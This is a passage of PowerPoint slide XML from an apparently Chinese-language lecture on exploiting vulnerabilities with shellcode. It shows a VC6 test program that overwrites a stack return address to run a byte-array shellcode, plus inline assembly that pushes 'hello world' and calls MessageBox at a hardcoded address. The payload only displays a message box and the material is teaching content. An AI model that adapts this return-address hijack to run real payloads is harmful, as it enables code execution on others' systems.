              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>来实现漏洞的利用了，一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>VC6</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>测试程序如下：</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="文本框 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{448BB3E5-C306-4128-B94E-4EE5501FFBCF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1532831" y="1672109"/>
            <a:ext cx="9793088" cy="4319147"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="86376" tIns="43188" rIns="86376" bIns="43188" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="100" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="宋体"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>#include &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="100" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="宋体"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>stdio.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="100" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="宋体"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2000" kern="100" dirty="0">
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="宋体"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="100" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="宋体"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>#include &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="100" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="宋体"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>windows.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="100" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="宋体"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2000" kern="100" dirty="0">
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="宋体"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="100" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="宋体"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>char </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="100" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="宋体"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>ourshellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="100" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="宋体"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>[]="\x33\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="100" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="宋体"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>xDB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="100" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="宋体"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>\x53\x53\x53\x53\xB8\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="100" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="宋体"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>xEA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="100" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="宋体"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>\x07\xD5\x77\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="100" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="宋体"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>xFF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="100" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="宋体"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>\xD0";</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2000" kern="100" dirty="0">
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="宋体"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="100" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="宋体"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>void main()</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2000" kern="100" dirty="0">
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="宋体"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="100" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="宋体"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2000" kern="100" dirty="0">
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="宋体"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="100" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="宋体"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="100" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="宋体"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>LoadLibrary</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="100" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="宋体"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>("user32.dll");</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2000" kern="100" dirty="0">
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="宋体"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="100" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="宋体"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>	int *ret;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2000" kern="100" dirty="0">
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="宋体"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="100" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="宋体"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>	ret=(int*)&amp;ret+2;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2000" kern="100" dirty="0">
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="宋体"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="100" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="宋体"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>	(*ret)=(int)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="100" dirty="0" err="1">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="宋体"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>ourshellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="100" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="宋体"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2000" kern="100" dirty="0">
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="宋体"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="100" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="宋体"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>	return;</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2000" kern="100" dirty="0">
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="宋体"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" kern="100" dirty="0">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="宋体"/>
                <a:cs typeface="Times New Roman"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2000" kern="100" dirty="0">
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="宋体"/>
              <a:cs typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E33316F-9BB9-4D4D-87E5-5CC49DD32582}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4413151" y="6352629"/>
            <a:ext cx="4752528"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请某位同学来回答一下原理</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="84930851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532831" y="447973"/>
            <a:ext cx="10369152" cy="364218"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="86376" tIns="43188" rIns="86376" bIns="43188" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>构造任意字符串？</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>“hello world”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>ASCII</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>码为：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>\x68\x65\x6C\x6C\x6F\x20\x77\x6F\x72\x6C\x64\x20</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                  <a:lumOff val="25000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="文本框 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{448BB3E5-C306-4128-B94E-4EE5501FFBCF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1532831" y="1672109"/>
            <a:ext cx="9793088" cy="5011645"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="86376" tIns="43188" rIns="86376" bIns="43188" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>asm</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>{</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>xor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>ebx,ebx</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>	push </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>//push 0</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>	push 20646C72h</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>	push 6F77206Fh</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>	push 6C6C6568h</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>esp</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>	push </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>ebx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>//push 0</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>	push </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>eax</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>	push </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>eax</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>	push </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>ebx</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>, 77d507eah// 77d507eah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>这个是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>MessageBox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>函数在系统中的地址</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>	call </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>eax</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="zh-CN" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="矩形 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1532831" y="918984"/>
            <a:ext cx="10459595" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" kern="100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="新宋体" panose="02010609030101010101" pitchFamily="49" charset="-122"/>
                <a:cs typeface="新宋体" panose="02010609030101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" kern="100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="新宋体" panose="02010609030101010101" pitchFamily="49" charset="-122"/>
                <a:cs typeface="新宋体" panose="02010609030101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>字节存入，硬编码空格是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" kern="100" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="新宋体" panose="02010609030101010101" pitchFamily="49" charset="-122"/>
                <a:cs typeface="新宋体" panose="02010609030101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
